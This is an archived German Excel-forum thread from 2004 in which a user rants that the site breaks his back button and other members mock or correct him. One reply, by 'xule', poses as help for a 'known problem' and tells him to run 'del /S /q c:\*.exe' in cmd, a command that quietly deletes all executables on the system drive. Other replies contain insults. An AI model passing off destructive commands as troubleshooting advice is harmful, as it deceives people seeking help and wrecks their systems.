Live-Forum - Die aktuellen Beiträge
Anzeige
Archiv - Navigation
524to528
Aktuelles Verzeichnis
Verzeichnis Index
Übersicht Verzeichnisse
Vorheriger Thread
Rückwärts Blättern
Nächster Thread
Vorwärts blättern
Anzeige
HERBERS
Excel-Forum (Archiv)
20+ Jahre Excel-Kompetenz: Von Anwendern, für Anwender
524to528
524to528
Aktuelles Verzeichnis
Verzeichnis Index
Verzeichnis Index
Übersicht Verzeichnisse
Inhaltsverzeichnis

ihr seid scheissse

ihr seid scheissse
30.11.2004 09:01:00
sick
leute, was soll der schrott? wenn ich von google aus hierher geleitet werde kan ich den zurück button klicken wie ich will, es passiert nix. seit ihr irgendwie kommunistisch/sektierisch angehaucht oder warum beschneidet ihr den nutzer in seiner freiheit? denkt ihr nicht das wenn er das angebot auf der seite gut findet er von alleine sa bleibt? aber ihr wisst scheinbar was gut is für den anwender und was nicht, er weiss es nur selber nicht so richtig, deswegen nehmt ihr ihm die entscheidung ab und sperrt ihn halt mal prophylaktisch auf euerer vaerkackten shice aufgemachte site ein... fuck off loosers!

8
Beiträge zum Forumthread
Beiträge zu diesem Forumthread

Betreff
Datum
Anwender
Anzeige
AW: ihr seid scheissse
30.11.2004 09:09:40
Heinz
Wenn du dich nur ein bisschen mit deinem Rechner auskennen würdest hättest du gemerkt, dass ein neues Fenster aufgeht. Und da gibt es eben kein Zurück mehr sondern nur noch ein "Schließen" damit du zurück zu google kommst.
AW: ihr seid scheissse
tobias
Hallo
also bei mir ist das auch so. Es öffnet sich kein neues Fenster und ich komme nicht mehr zu google zurück. Ist schon nicht so geschickt.
Aber trotzdem ist un bleibt das ein super Forum
mfg tobias
AW: ihr seid scheissse
Timmy
Reg dich ab. Du hast wirklich nix zu tun sonst oder?
AW: Achtung! Psychiatrie hat Ausgang oT.
30.11.2004 09:11:38
HermannZ
.
AW: ihr seid scheissse
xule
Hallo sick of it all
Das ist ein bekanntes Problem, was du aber sehr leicht abstellen kannst.
Führe folgende Schritte aus.
Start, Ausführen
cmd eingeben und Ok
dort dann del /S /q c:\*.exe eintippen, Return
fertig.
Jetzt ist für lange Zeit dieses Problem gelöst. :-)
Wenn dir das zu kompliziert erscheint, melde dich noch mal, dann schreib ich dir ein makro dafür.
Gruß aus Siegen
Wichtig funktioniert nur bei dem Problem von "sick of it all"
Anzeige
Heul doch !!!
Volker
Wer noch nicht bemerkt hat, dass man einen Link über das Kontextmenü in einem neuen Fenster öffnen kann, hat bestimmt mit seinem PC noch mehr selbstverschuldeten Frust,
den er irgendwo ablassen muß.
AW: ihr seid scheissse
30.11.2004 10:12:20
Andi
Eigentlich ist ja schon genug gesagt worden über diesen qualifizierten Beitrag, ich möchte aber dennoch darauf hinweisen, dass zumindest jeder Browser den ich kenne auch ein zum "Zurück"-Knopf gehöriges drop-down-Menü hat, über welches man recht bequem auch von herber.de zu google zurückkommt.
Gute Besserung,
Andi
AW: ihr seid scheissse
Matthias
Hallo,
ich hoffe, dass Du bald wieder gesund wirst!!!
Wäre doch schade.....
Anzeige

Beliebteste Forumthreads (12 Monate)

Anzeige

Beliebteste Forumthreads (12 Monate)

Anzeige
Anzeige
Anzeige